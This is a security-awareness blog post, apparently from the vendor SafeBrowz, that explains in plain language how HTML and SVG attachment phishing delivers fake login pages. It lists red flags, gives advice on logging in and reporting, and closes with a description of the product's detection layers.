ATTACK TECHNIQUES

HTML and SVG attachment phishing, explained in plain language

Instead of a link, the entire phishing page is attached to the email as a file. Open it and a fake login screen draws itself right inside your browser. There is no URL for the email filter to catch.

SB

SafeBrowz Threat Research Security ResearchJune 15, 202611 min read

Why this gets past email security

Email filters are very good at one thing: looking at links. Every URL in a message gets rewritten, sandboxed, reputation-checked, and compared against blocklists. A brand-new phishing domain still has a domain, and a domain can be scanned, aged, and scored. That is the whole game for a normal phishing email.

Attachment phishing removes the thing the filter is built to inspect. The message body can be a single bland sentence, "Please review the attached document," with no link at all. The malicious content lives in a file. And a file named invoice.html or statement.svg looks boring. Many filters treat HTML and SVG as low-risk document or image types and do not unpack them with the same suspicion they apply to a .exe or a macro-laden Office file.

The payoff for the attacker is freshness. There is no domain to age, no link reputation to build. The phishing page only exists for the few seconds it takes your browser to render the file. By the time anyone reports the campaign, the attacker has already rotated to a new file name and a new template.

What actually happens when you open the attachment

Double-click the file and your operating system hands it to your default browser, because both .html and .svg are file types browsers open natively. The browser reads the file off your local disk and renders it. What you see is a login page. Often a pixel-accurate copy of the Microsoft 365 sign-in screen, sometimes Google, sometimes a bank or an e-signature service.

Look at the address bar and you will not see a normal web address. You will see something that starts with file:// followed by a long path on your own computer, or in the SVG-with-JavaScript case a blob: address. That is the single biggest tell. A real login page is served from a real domain. A real Microsoft login lives on login.microsoftonline.com. A real Google login lives on accounts.google.com. A login page that opened from a file you just downloaded is not either of those, no matter how perfect the logo looks.

When you type your email and password and press sign in, the form does not log you in anywhere. It sends your credentials to a server the attacker controls, usually buried in the file as a hidden form action or a snippet of JavaScript. Many of these pages then redirect you to the genuine site with a "session expired" message, so the failed attempt feels like a glitch and you simply log in again on the real page without ever suspecting anything was wrong.

Why "it is just an image" is wrong for SVG

This is the part most people get caught by. A JPG or PNG is a grid of colored pixels and nothing else. It cannot contain a login form, it cannot run code, it cannot send your password anywhere. So when an attachment ends in an image extension, the instinct is to relax.

SVG breaks that instinct. SVG stands for Scalable Vector Graphics, and under the hood it is not pixels at all. It is XML, a text-based markup language, the same family as HTML. An SVG file is read as code, and that code can legitimately include HTML elements and <script> tags. Browsers honor that script when the SVG is opened directly as its own document. So an attacker can write an SVG that, the moment you open it, runs JavaScript that paints a complete Microsoft login form on the screen and wires it up to steal what you type. The "image" is a program.

Security researchers at Kaspersky documented exactly this pattern in their Securelist write-up on SVG phishing: SVG files with embedded HTML and JavaScript that launch a fake Microsoft sign-in page, including campaigns disguised as e-signature notifications. The technique works precisely because so many tools, and so many people, still treat anything ending in an image extension as harmless.

How fast this is growing

This is not a fringe trick. It went mainstream through 2025 and into 2026.

KnowBe4 reported a 245% increase in SVG files used to hide phishing payloads. Threat researchers tracking the trend found a sharp spike in SVG campaigns in March 2025, with thousands of these emails caught in the first quarter alone, and SVG attachments climbing to a meaningful share of all attachment-based phishing by mid-year. In September 2025, Microsoft's own security team detailed a campaign where the payload appeared to be AI-generated, disguised as a business analytics dashboard inside the SVG, with polymorphic file names and subjects that changed on every message to defeat hash-based detection. Microsoft's write-up, AI vs. AI: detecting an AI-obfuscated phishing campaign, walks through how the file masqueraded as a shared PDF before redirecting to a CAPTCHA and then a credential-harvesting page.

HTML attachments are the older cousin and remain heavily used. The two are functionally the same idea: ship the phishing page as a file so the email carries no link. SVG simply added a layer of evasion, because filters that learned to scrutinize HTML attachments were slower to treat image files the same way.

A common next step in these campaigns is a real follow-up domain. The attachment shows the fake form, and once you submit, it forwards your details to a live phishing host, often a throwaway page on a free hosting service like office365-verify-login.vercel.app. That kind of address is exactly what SafeBrowz flags. Paste it into the checker above and watch it come back as a brand-impersonation phish, because it borrows a Microsoft product name on a domain Microsoft does not own.

Red flags that should stop you cold

• An unexpected .html, .htm, or .svg attachment. Real invoices, receipts, and shared documents arrive as PDF, Office files, or a link to a known portal. A web-page or image file attached to a "review this document" email is abnormal. Treat it as hostile until proven otherwise.
• "Open the attached document to view" or "open to sign in." Legitimate services send you to their website to sign in. They do not ship the sign-in screen as a file you have to open.
• A login form that loads from a file:// or blob: address. Look at the address bar the instant a sign-in page appears. If it does not start with https:// followed by a real domain, it is not a real login page. Full stop.
• The page asks for your password right after you opened a downloaded file. The sequence "I just opened an attachment, now I am being asked to log in" is the whole attack. Stop there.
• The email body is almost empty. A single line like "Please find attached" with no link and no detail is a hallmark of attachment phishing, because the attacker is keeping the message clean so filters find nothing to scan.
• An e-signature or file-sharing notification you were not expecting. Fake DocuSign and "shared PDF" lures are a favorite wrapper for SVG payloads. If you did not initiate the document, verify before opening.
• The file name looks generic or scrambled. scan_0421.svg, invoice.html, or randomized names that change between recipients are built to dodge hash-based detection, not to inform you.
• Your password manager refuses to autofill. A manager binds saved logins to the exact real domain. When it stays silent on a "login page," that silence is telling you the page is not the real site.

What to do instead

The defense is short and it does not require any technical skill. Never enter a password into a page that opened from an email attachment. If you genuinely need to log into Microsoft, Google, your bank, or any service, close the attachment, open a new tab, and type the address yourself or use a saved bookmark. Sign in there. If the message was real, your account or document will be waiting for you. If it was a phish, you just walked straight past it.

If you already opened one of these files, opening it alone did not give anything away. The danger is only the moment you type credentials. If you did type a password, change it immediately on the real site from a fresh tab, change it anywhere else you reused it, and turn on two-factor authentication so a stolen password is not enough on its own. For a deeper walkthrough of confirming whether a message is genuine, see our guide to verifying whether an email is real.

How to report it

Reporting helps the campaign get shut down for everyone else.

• In your email client, use Report phishing or Report junk rather than just deleting. That feeds the provider's filters directly.
• At work, forward it to your IT or security team so they can block the sender and warn colleagues.
• In the United States, report to the FTC at reportfraud.ftc.gov and, if money or accounts were lost, to the FBI at ic3.gov.
• To the impersonated brand, Microsoft, Google, and most banks all run an abuse or phishing report inbox. Forwarding the sample helps them take down the follow-up infrastructure.

FAQ

Can opening an HTML or SVG attachment hurt me even if I do not type anything?

For the credential-phishing case, no. The danger is the fake login form, and that only costs you something when you type a password and submit it. Opening the file shows you the page; entering credentials is what hands them over. That said, do not make a habit of opening unexpected attachments, and never enter anything into a page that opened from a file.

Is an SVG file really able to run code? It looks like an image.

Yes. SVG is XML, a text-based markup language, not a grid of pixels like JPG or PNG. It can legitimately include HTML and <script> tags, and a browser will run that script when the SVG is opened directly as its own document. That is exactly what these phishing files abuse to draw and wire up a fake login form.

Why does my email provider let these files through?

Email filters are built to inspect links, and attachment phishing carries no link in the message. HTML and especially SVG files were long treated as low-risk document or image types and were not unpacked as aggressively as executables. Providers are catching up, but attackers rotate file names and templates on every message to stay ahead of signatures.

How do I know if a login page is fake?

Check the address bar. A real login is served over https:// from the brand's real domain (a real Microsoft login is on login.microsoftonline.com). If the address starts with file:// or blob:, or shows any domain that is not the brand's own, it is fake. Our guide to telling if a website is a scam covers the URL checks in detail.

How is this different from a normal phishing link?

A normal phish puts a link in the email and the fake page lives on a web server. Attachment phishing ships the fake page as a file, so the email has no link to scan and the page renders from your own disk. The end goal, stealing your password, is the same; the delivery hides from link-based defenses.

Does this only target Microsoft accounts?

Microsoft 365 is the most common lure because work accounts are valuable, but the same technique impersonates Google, banks, and e-signature services like DocuSign. See our DocuSign phishing breakdown and our guide to spotting Microsoft phishing emails for the brand-specific versions.

Will antivirus catch a malicious SVG?

Sometimes, but do not rely on it. Because the SVG carries no traditional malware, only a login form and a form action, many engines see nothing executable to quarantine. Your own habit, never logging in from an attachment, is the dependable defense.

How SafeBrowz blocks this threat

An attachment opens locally on your own machine, so we are honest about the boundary: SafeBrowz does not scan files sitting on your disk. What it does catch is the moment the attack reaches the network. Almost every one of these fake forms has to send your credentials somewhere, and many redirect you to a live phishing host first. That destination is a domain, and a domain is exactly what our engine inspects.

SafeBrowz runs a 3-layer detection architecture: Local + APIs + AI.

• Layer 1 - Local detection: 60+ URL patterns plus 550+ brand-specific signatures (including Cyrillic and Punycode homograph variants) and a community whitelist/blacklist, all running directly in the extension before the destination page renders. The instant a fake form tries to submit to, or redirect you toward, a Microsoft- or Google-looking domain that is not the real one, the brand-on-wrong-domain check fires.
• Layer 2 - API checks: aggregates Google Safe Browsing, PhishTank, URLhaus, ScamAdviser, and 30+ scam TLD lists to catch destinations already known to be malicious.
• Layer 3 - AI deep scan (Premium): 100+ language content analysis reads the landing page itself and flags a credential-harvesting clone of a brand it does not officially own, catching novel variants in seconds.

Detection signatures are derived from threat-intelligence research and our internal brand database, not from user browsing data. SafeBrowz does not store per-user browsing history.